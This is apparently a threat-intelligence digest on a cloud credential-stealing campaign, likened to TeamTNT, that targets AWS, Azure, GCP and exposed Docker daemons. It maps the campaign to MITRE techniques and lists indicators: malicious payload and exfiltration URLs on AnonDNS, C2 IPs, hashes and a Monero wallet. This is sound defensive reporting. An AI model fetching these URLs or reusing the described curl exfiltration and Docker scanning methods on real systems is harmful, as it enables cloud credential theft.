An actor behind a cloud credentials-stealing campaign expands from AWS to Azure and Google Cloud Platform, introducing modular tooling, Docker-targeting propagation, and data exfiltration to AnonDNS. Research notes similarities to TeamTNT and highlights ongoing tooling evolution toward broader cloud targets and stealthier operations. Hashtags: #Cloud_Credentials_Stealer #Azure #GoogleCloudPlatform #AnonDNS #TeamTNT #Permiso #Docker #AWS
Keypoints
- In June 2023, the actor expanded credential theft to Azure and GCP beyond AWS.
- Exposed Docker services are targeted, with a worm-like propagation module added.
- Tooling became more modular; AWS functionality is driven by run_aws_grabber, with new Azure and GCP logic (get_azure and get_google).
- The campaign infrastructure moved from a Netherlands-based IP to AnonDNS (DDNS), using hardcoded credentials for C2.
- System profiling and discovery were added (get_docker, get_prov_vars, Data.sh) to enumerate hosts, containers, and processes.
- Credentials collection now targets numerous files across CSPs (Azure, GCP, Kubernetes secrets, Redis, etc.), with updated credential file arrays.
- Exfiltration uses curl to send data to AnonDNS endpoints; multiple exfil URLs and SHA1s indicate evolving variants.
MITRE Techniques
- [T1059.003] Unix Shell – The campaigns rely on Bash scripts (aws.sh, Data.sh) and show modular function design;
Quote: “The script uses the cred_files function to search for credentials files on the system, write them to a temporary file …” - [T1027.001] Obfuscated/Compressed Data – An embedded base64 blob is decoded to reveal a Bash script;
Quote: “The main_main function decodes an embedded base64 blob, resulting in a Bash script that is written and then executed by the main_runCommand function.” - [T1046] Network Service Scanning – The actor uses masscan and zgrab to identify vulnerable targets;
Quote: “Masscan scans the specified IP ranges then passes the results to zgrab, which looks for misconfigured Docker daemons running version 1.16.” - [T1105] Ingress Tool Transfer – The attacker downloads tooling from their server to install dependencies;
Quote: “downloads the dependencies from the attacker’s server, hosted at the URI: /bin/[bin_name].” - [T1071.001] Web Protocols – C2 communications and exfiltration use HTTP/S endpoints;
Quote: “Exfil URL http[:]//everlost.anondns.net/upload.php” - [T1041] Exfiltration Over C2 Channel – Exfiltration of collected cred data to an AnonDNS server;
Quote: “The credentials stealing scripts use curl to exfiltrate the contents of the $CSOF file to an AnonDNS-hosted server.” - [T1552.001] Credentials in Files – The campaign targets credential files across CSPs (Azure, GCP, AWS), including azure.json and various cloud-related artifacts;
Quote: “The credentials collection logic in the new campaign’s samples targets the following services & technologies:” - [T1057] Process Discovery – System profiling includes examining running processes;
Quote: “ps aux Details about all running processes” - [T1033] System Owner/User Discovery – Identity discovery via whoami and user listings;
Quote: “Current user” and “List of users with active terminal sessions”
Indicators of Compromise
- [SHA1] Cloud credential stealer hashes – 0e1805fd9efa6a1c3fe9adb3f34373a9dcc7fe19, 18d28ac44c5501f1768f0fc155ad38aa56610881, and other hashes
- [Domain] Exfil/C2 domains – ap-northeast-1.compute.internal.anondns.net, everlost.anondns.net, silentbob.anondns.net
- [Domain] Exfil/C2 domains – everfound.anondns.net, everlost.anondns.net
- [IPv4] Command & control / exfil endpoints – 207.154.218.221, 45.9.148.108
- [URL] Exfil and command URLs – http://silentbob.anondns.net/bin/chattr, http://silentbob.anondns.net/bin/a, http://silentbob.anondns.net/cmd/grab.sh, http://silentbob.anondns.net/cmd/clean.sh, http://silentbob.anondns.net/cmd/aws.sh
- [FileName] Credential-related scripts – run.sh, aws.sh, g.aws.sh, data.sh
- [Monero] Wallet address – 43Lfq18TycJHVR3AMews5C9f6SEfenZoQMcrsEeFXZTWcFW9jW7VeCySDm1L9n4d2JEoHjcDpWZFq6QzqN4QGHYZVaALj3U